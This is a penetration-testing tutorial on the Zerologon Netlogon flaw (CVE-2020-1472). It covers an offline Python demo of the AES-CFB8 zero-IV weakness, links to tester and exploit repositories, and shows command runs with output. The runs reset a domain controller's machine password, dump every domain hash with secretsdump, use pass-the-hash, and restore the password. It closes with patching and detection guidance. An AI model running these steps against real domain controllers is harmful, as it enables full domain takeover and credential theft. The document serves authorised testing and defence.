Zerologon (CVE-2020-1472)

Zerologon (CVE-2020-1472) is a flaw in the cryptography of the Netlogon Remote Protocol (MS-NRPC), the protocol machine accounts use to authenticate to a domain controller. Netlogon credentials are computed with AES-CFB8 under a fixed all-zero IV, so for roughly one session key in 256 an all-zero client challenge produces an all-zero credential. An unauthenticated attacker with network access to the DC can therefore repeat the authentication handshake with zero-filled values until one attempt is accepted (256 tries on average, a couple of thousand at most) and, now authenticated as the domain controller's own machine account, reset that account's password to an empty string. This is a very dangerous attack: not only does it give full domain compromise, it breaks the domain controller itself if the password is not restored, because the change is made only in Active Directory while the DC's local copy of its machine-account secret is untouched, so the DC can no longer authenticate to the domain (replication and other DC-to-DC operations fail). For this reason, during a pentest only run the test script, which makes authentication attempts but changes nothing, to verify that a domain controller is vulnerable. Microsoft patched the vulnerability in the August 2020 security updates and moved to mandatory enforcement in February 2021.
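The following is an added worked example, not code from the page or from either of the repositories linked below. It reproduces the cryptographic core of the bug in isolation: the AES-CFB8 credential computation with a zero IV, the check that an all-zero credential is accepted exactly when the first keystream byte is zero, the empirical one-in-256 rate, and a model of the brute force where every attempt runs under a fresh session key. Real AES is used when the third-party cryptography package is installed; otherwise a SHA-256 stand-in block function (an assumption for illustration, not what Netlogon uses) is substituted, since the CFB8 property holds for any block function. It talks to no network and is safe to run anywhere.

```python
"""
Why Zerologon works. MS-NRPC computes the Netlogon credential with AES-CFB8
under a fixed all-zero IV. In CFB8 each output byte is E_k(register)[0] XOR
the plaintext byte, and the ciphertext byte is then shifted into the register.
With a zero IV and a zero 8-byte challenge the register never changes while
the keystream byte is 0x00, so the whole credential is zero exactly when
E_k(0^16)[0] == 0x00, which happens for about one key in 256.
"""
import hashlib
import random

try:  # real AES-128 when the 'cryptography' package is installed
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_AES = True
except ImportError:  # otherwise fall back to a stand-in block function (assumption, see below)
    HAVE_AES = False

ZERO_IV = bytes(16)        # MS-NRPC fixes the AES-CFB8 IV to 16 zero bytes
ZERO_CHALLENGE = bytes(8)  # the attacker's all-zero ClientChallenge


def make_block_fn(key: bytes):
    """Return a 16-byte block function E_k. AES-128 if available; the fallback
    is only a SHA-256 based stand-in PRF and is NOT what Netlogon uses, but the
    CFB8 property demonstrated here holds for any block function."""
    if HAVE_AES:
        def aes_block(block: bytes) -> bytes:
            enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
            return enc.update(block) + enc.finalize()
        return aes_block

    def prf_block(block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:16]
    return prf_block


def cfb8_encrypt(block_fn, iv: bytes, plaintext: bytes) -> bytes:
    """8-bit cipher feedback mode, as used by ComputeNetlogonCredential."""
    reg = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = block_fn(bytes(reg))[0] ^ p  # keystream byte is E_k(register)[0]
        out.append(c)
        reg = reg[1:] + bytes([c])       # shift the ciphertext byte into the register
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """AES-CFB8(SessionKey, IV = 0, Challenge): the MS-NRPC AES credential."""
    return cfb8_encrypt(make_block_fn(session_key), ZERO_IV, challenge)


def zero_credential_accepted(session_key: bytes) -> bool:
    """Would the DC accept an all-zero ClientCredential for a zero challenge?"""
    return compute_netlogon_credential(session_key, ZERO_CHALLENGE) == bytes(8)


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """The equivalent condition: E_k(0^16)[0] == 0x00."""
    return make_block_fn(session_key)(ZERO_IV)[0] == 0


def random_key(rng: random.Random) -> bytes:
    return bytes(rng.getrandbits(8) for _ in range(16))


def count_weak_keys(n_keys: int, seed: int = 7) -> int:
    """How many of n_keys random session keys accept the zero credential
    (expected about n_keys / 256)."""
    rng = random.Random(seed)
    return sum(zero_credential_accepted(random_key(rng)) for _ in range(n_keys))


def simulate_attack(max_attempts: int = 2000, seed: int = 1):
    """Model of the brute force: each NetrServerAuthenticate3 attempt runs under a
    fresh session key (the DC picks a new ServerChallenge every time), the attacker
    always sends zero challenge + zero credential and stops at the first accept.
    Returns the attempt number, or None if no attempt succeeded."""
    rng = random.Random(seed)
    for attempt in range(1, max_attempts + 1):
        if zero_credential_accepted(random_key(rng)):
            return attempt
    return None


def success_probability(attempts: int) -> float:
    """1 - (255/256)^attempts: chance that at least one attempt is accepted."""
    return 1.0 - (255.0 / 256.0) ** attempts


if __name__ == "__main__":
    print("block function:", "AES-128 (cryptography)" if HAVE_AES else "SHA-256 stand-in")
    print("weak keys among 10000:", count_weak_keys(10000))
    print("attempts needed in simulation:", simulate_attack())
    print("P(success within 2000 attempts) = %.4f" % success_probability(2000))
```

The 2000-attempt cap used by the public tester is not arbitrary: success_probability(2000) is about 0.9996, while 256 attempts already give about 0.63. The patch does not change the cipher mode; it rejects client challenges with repeated bytes and makes signed and sealed Netlogon channels mandatory, which removes the attacker's ability to pick the zero challenge in the first place.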

The test script (zerologon_tester.py, written by Secura; it needs Impacket installed) can be cloned from:

https://github.com/SecuraBV/CVE-2020-1472

The exploit (cve-2020-1472-exploit.py) and the matching restore script (restorepassword.py) can be cloned from:

https://github.com/dirkjanm/CVE-2020-1472

Testing for the vulnerability

The tester takes the domain controller's NetBIOS name and its IP address. It only performs Netlogon authentication attempts with zero-filled values (up to 2000 of them, printing one character per attempt) and changes nothing on the target, so it is safe to run during an assessment.

python3 zerologon_tester.py SERVER2019 192.168.1.50
Performing authentication attempts...
====================================================================================================================================================================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.

Exploiting the vulnerability

Run this only with explicit authorisation, and have the restore step below ready before you start: from the moment it completes, the DC's machine account password in AD no longer matches the one the DC holds locally. The exploit in the dirkjanm repository is named cve-2020-1472-exploit.py (it is shown here under a different file name) and takes the same two arguments as the tester.

python3 zero_logoncheck.py SERVER2019 192.168.1.50
Performing authentication attempts...
===============================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Post exploit looting

The machine account SERVER2019$ now has an empty password in AD, so authenticate as it and use the DRSUAPI replication interface (-just-dc) to pull every domain hash out of NTDS.DIT. Press Enter at the Password: prompt, since the password is the empty string (or pass -no-pass). The backslash keeps the shell from expanding the $.

secretsdump.py -just-dc PWNME/SERVER2019\$@192.168.1.50
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
pwnme.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4eee7449c5c6f03e7e7361d2f7e0a16d:::
<snip>

Restoring the password

The exploit changed the machine account password only in Active Directory; the DC's own copy of the secret, stored locally in LSA as $MACHINE.ACC, is untouched and still holds the original password. That is what makes restoration possible. Use the domain Administrator's NT hash from the NTDS dump to authenticate to the DC (pass-the-hash, -hashes LMHASH:NTHASH), let secretsdump read the local SAM and LSA secrets over the remote registry, and copy the complete value of plain_password_hex (the original password as UTF-16LE bytes, hex encoded). Do this as soon as possible after the exploit: the DC cannot authenticate to the domain while the two passwords differ.

secretsdump.py administrator@192.168.1.50 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x72d243dfa0e057c976342f73088a46d0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PWNME0\SERVER2019$:aes256-cts-hmac-sha1-96:caa063731e21ba52be7259c75266992af3f2dff849b59fa230540d645846d982
PWNME0\SERVER2019$:aes128-cts-hmac-sha1-96:ca18541241a4e68554e8c106f15114f0
PWNME0\SERVER2019$:des-cbc-md5:fe67f486efd35838
PWNME0\SERVER2019$:plain_password_hex:6fe613775a747c5883b6d25904da6cdec58697ff4ac926a1be926fe5c560648b9ad35b6c73a2d8840f2104a199a5687935d8533c4036a89b7a82ea2a00aa96b2cb5110bd9a8d1d4d5e291b8226e4ffdef0af253d2c39fec71f200d6b4dc943fa932f22391f628d8a1674bfb16067db8ccb68db3f95fdbdda16149d02e1f89b28523a82171e09ab17bd55abb3a3b637a5a938918944e1317d4ac18230eab0c34b53b3f7aa5d3e2889159def0d342eb270071f120e8d96f7582992920a1ee5aaa7fa99479d541d255f0f21bc5760674cf5f262d5c6ff982c492f2d30d66504a5711661909b1a4fdd55639686a812a2853a

Use the hex string to restore the password. The value is one unbroken string (480 hex digits here, i.e. the 240 bytes of a 120-character machine password); if your terminal wrapped it, join the pieces before passing them to -hexpass, because a truncated value would set yet another wrong password.

python3 restorepassword.py PWNME/SERVER2019@SERVER2019 -target-ip 192.168.1.50 -hexpass 6fe613775a747c5883b6d25904da6cdec58697ff4ac926a1be926fe5c560648b9ad35b6c73a2d8840f2104a199a5687935d8533c4036a89b7a82ea2a00aa96b2cb5110bd9a8d1d4d5e291b8226e4ffdef0af253d2c39fec71f200d6b4dc943fa932f22391f628d8a1674bfb16067db8ccb68db3f95fdbdda16149d02e1f89b28523a82171e09ab17bd55abb3a3b637a5a938918944e1317d4ac18230eab0c34b53b3f7aa5d3e2889159def0d342eb270071f120e8d96f7582992920a1ee5aaa7fa99479d541d255f0f21bc5760674cf5f262d5c6ff982c492f2d30d66504a5711661909b1a4fdd55639686a812a2853a

Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] StringBinding ncacn_ip_tcp:192.168.1.50[49681]
Change password OK

Mitigation

Apply the Microsoft security update for CVE-2020-1472 (released August 2020) to every domain controller. The fix was rolled out in two phases: the initial release makes DCs require secure RPC for Windows machine accounts, trusts and DCs and only logs non-compliant devices, and from 9 February 2021 the enforcement phase makes secure Netlogon channels mandatory for all devices unless explicitly exempted by group policy. Enforcement can be switched on early by setting the FullSecureChannelProtection registry value to 1 under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters. After patching, review the System log on DCs for Netlogon event IDs 5827 and 5828 (vulnerable connections denied) and 5829, 5830 and 5831 (vulnerable connections still allowed) to find devices that need attention before enforcement. To catch an actual exploitation attempt, alert on Security event 4742 (a computer account was changed) for a DC's own machine account where the subject is ANONYMOUS LOGON.